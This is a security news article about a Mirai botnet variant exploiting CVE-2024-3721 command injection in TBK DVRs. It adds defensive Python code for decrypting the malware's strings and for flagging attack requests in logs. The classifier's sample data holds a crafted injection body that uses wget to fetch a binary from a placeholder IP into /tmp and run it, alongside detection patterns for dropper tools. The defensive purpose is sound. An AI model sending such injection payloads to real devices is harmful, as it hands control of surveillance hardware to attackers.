
A new wave of Mirai botnet activity is exploiting a recently disclosed vulnerability in TBK DVR devices, CVE-2024-3721, to infect internet-connected systems with a custom ARM32 malware variant designed to evade analysis and sustain persistent remote control.
Kaspersky uncovered the exploitation attempt while monitoring honeypots. The campaign targets a command injection flaw in TBK DVR-4104 and DVR-4216 devices, allowing unauthenticated remote attackers to execute arbitrary Linux commands via a specially crafted POST request to the device's HTTP interface. The vulnerability, cataloged as CVE-2024-3721, stems from improper input sanitization in the /device.rsp endpoint, specifically via the mdb and mdc parameters.
Kaspersky's telemetry first detected exploitation attempts in early June 2025. A malicious request was observed in the honeypot logs, embedding shell commands to download and execute an ARM32 binary.
Delivering a single ARM32 binary lets the attackers skip the usual platform-detection stage: because ARM32 is the architecture used by many DVRs, the payload is pushed directly rather than after probing the target, which streamlines the infection process and keeps operational noise low.
The vulnerable devices are digital video recorders (DVRs) manufactured by TBK, widely deployed for surveillance applications, and accessible remotely via web interfaces. According to public scans, over 50,000 such devices remain exposed online, although the total potentially affected population exceeds 114,000 globally. Countries with the highest number of observed infections include China, India, Egypt, Ukraine, Russia, Turkey, and Brazil.
Once executed, the downloaded binary turns out to be a customized Mirai variant. While Mirai has been circulating since its source code leaked in 2016, this new version includes several upgrades:
- RC4 Encryption with XOR-Obfuscated Key: Malware strings are encrypted using RC4 with a key obfuscated via XOR. The recovered key is 6e7976666525a97639777d2d7f303177, used to decrypt strings stored in a global list for runtime access.
- Anti-VM and Anti-Emulation Checks: The implant scans /proc for process names indicating virtualized environments such as QEMU or VMware. If such indicators are present, execution halts.
- Directory Whitelist Enforcement: Execution is limited to a set of hardcoded directories, helping avoid unintended environments and complicating automated analysis.
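The string protection described above is what an analyst has to undo first. The following is an added example (it is not code from the Kaspersky write-up or from the malware) of the kind of string decryptor written once a sample's RC4 key is known. The key value is the one quoted in the article; treating it as 16 raw bytes rather than a 32-character ASCII string is an assumption, as is the single-byte XOR mask, and the encrypted string table is constructed here for the demonstration.

```python
# Added example: RC4 string-table decryptor with an XOR-masked key.
# The key is the value quoted in the article; the mask and string table
# are constructed for this demonstration and are not from the sample.

RECOVERED_KEY = bytes.fromhex("6e7976666525a97639777d2d7f303177")
XOR_MASK = 0x5A  # assumed single-byte mask; the sample's real mask is not given


def xor_bytes(data: bytes, mask: int) -> bytes:
    """XOR every byte with a one-byte mask (the operation is its own inverse)."""
    return bytes(b ^ mask for b in data)


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling followed by the PRGA; encrypt and decrypt are the same op."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def recover_key(obfuscated_key: bytes, mask: int) -> bytes:
    """Undo the XOR masking applied to the stored key."""
    return xor_bytes(obfuscated_key, mask)


def decrypt_table(obfuscated_key: bytes, mask: int, table) -> list:
    """Recover the key, then decrypt every entry of the global string list."""
    key = recover_key(obfuscated_key, mask)
    return [rc4_crypt(key, entry).decode("latin-1") for entry in table]


# Constructed stand-in for the malware's global list of encrypted strings:
# the key is stored XOR-masked and each entry is RC4(key, plaintext).
OBFUSCATED_KEY = xor_bytes(RECOVERED_KEY, XOR_MASK)
PLAIN_STRINGS = [b"/proc/", b"qemu", b"vmware", b"/tmp/"]
ENCRYPTED_TABLE = [rc4_crypt(RECOVERED_KEY, s) for s in PLAIN_STRINGS]


if __name__ == "__main__":
    for s in decrypt_table(OBFUSCATED_KEY, XOR_MASK, ENCRYPTED_TABLE):
        print(s)
```

Because RC4 is symmetric, the same routine that the implant uses at runtime serves as the decryptor; the only sample-specific inputs are the masked key blob, the mask, and the table offsets, all of which come out of static analysis of the binary.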
The vulnerability was disclosed via a public GitHub repository by a user named “netsecfish”, who provided a full proof-of-concept demonstrating command injection via curl. The attack relies on direct manipulation of the POST parameters in /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX, with no user interaction required, qualifying it as a critical remote code execution risk.
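Given the endpoint and parameters named above, exploitation attempts are easy to pick out of honeypot or reverse-proxy logs. The following is an added example, not code from the article or from Kaspersky: a small classifier over constructed request records. The record layout, the sample requests and the documentation-range addresses are constructed for the demonstration; the endpoint, query string and parameter names (/device.rsp, opt=sys&cmd=S_O_S_T_R_E_A_MAX, mdb, mdc) are those the article reports.

```python
# Added example: flag CVE-2024-3721-style requests in HTTP request records.
# Record layout and samples are constructed; endpoint/parameter names follow
# the article.
import re
from urllib.parse import unquote_plus, urlsplit

TARGET_PATH = "/device.rsp"
TARGET_QUERY = {"opt": "sys", "cmd": "S_O_S_T_R_E_A_MAX"}
INJECTABLE_PARAMS = ("mdb", "mdc")

# Shell control characters and a command-substitution opener that have no
# business in a DVR stream-control parameter.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")
# Tooling typically seen when a stage-one command fetches and runs a payload.
DROPPER_HINTS = re.compile(r"\b(wget|curl|tftp|busybox|chmod)\b|/tmp/", re.IGNORECASE)


def parse_form(data: str) -> dict:
    """Split x-www-form-urlencoded data on '&' only.

    Done by hand rather than with parse_qs so that a ';' inside a value stays
    part of the value (older parse_qs versions treat it as a separator).
    """
    fields = {}
    for pair in data.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def classify(record: dict) -> dict:
    """Return a verdict for one request record.

    exploit_attempt - vulnerable endpoint hit with shell metacharacters or
                      dropper tooling in mdb/mdc
    endpoint_probe  - vulnerable endpoint hit, parameters look clean
    benign          - anything else
    """
    parts = urlsplit(record["target"])
    query = parse_form(parts.query)
    reasons = []
    on_endpoint = (
        record["method"].upper() == "POST"
        and parts.path == TARGET_PATH
        and all(query.get(k) == v for k, v in TARGET_QUERY.items())
    )
    if not on_endpoint:
        return {"src": record["src"], "verdict": "benign", "reasons": reasons}

    body = parse_form(record.get("body", ""))
    for name in INJECTABLE_PARAMS:
        value = body.get(name, "")
        if SHELL_META.search(value):
            reasons.append(f"shell metacharacter in {name}={value!r}")
        if DROPPER_HINTS.search(value):
            reasons.append(f"dropper tooling in {name}={value!r}")
    verdict = "exploit_attempt" if reasons else "endpoint_probe"
    return {"src": record["src"], "verdict": verdict, "reasons": reasons}


def scan(records) -> list:
    return [classify(r) for r in records]


# Constructed sample records; 203.0.113.0/24 is documentation address space.
SAMPLE_RECORDS = [
    {"src": "203.0.113.10", "method": "POST",
     "target": "/device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX",
     "body": "mdb=sos&mdc=;wget+http://203.0.113.99/arm32.bin+-O+/tmp/a;sh+/tmp/a"},
    {"src": "203.0.113.11", "method": "POST",
     "target": "/device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX",
     "body": "mdb=sos&mdc=ch1"},
    {"src": "203.0.113.12", "method": "GET", "target": "/login.htm", "body": ""},
]


if __name__ == "__main__":
    for result in scan(SAMPLE_RECORDS):
        print(result["src"], result["verdict"], *result["reasons"], sep="  ")
```

The "endpoint_probe" verdict is deliberately separate from a clean result: a DVR management interface should not be reachable from the internet at all, so any external POST to this endpoint is worth a look even when the parameters carry nothing suspicious.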
The same researcher has previously disclosed exploits against end-of-life (EoL) D-Link routers, impacting over 90,000 devices.
It is unclear whether TBK has fixed CVE-2024-3721. Because many third-party brands build their own models on these devices, patch availability varies, and for most there is very likely none. If you operate a TBK DVR-4104, DVR-4216, or a rebranded version of either, contact your vendor about patch availability. If no fix is to be rolled out, replace the devices with actively supported models.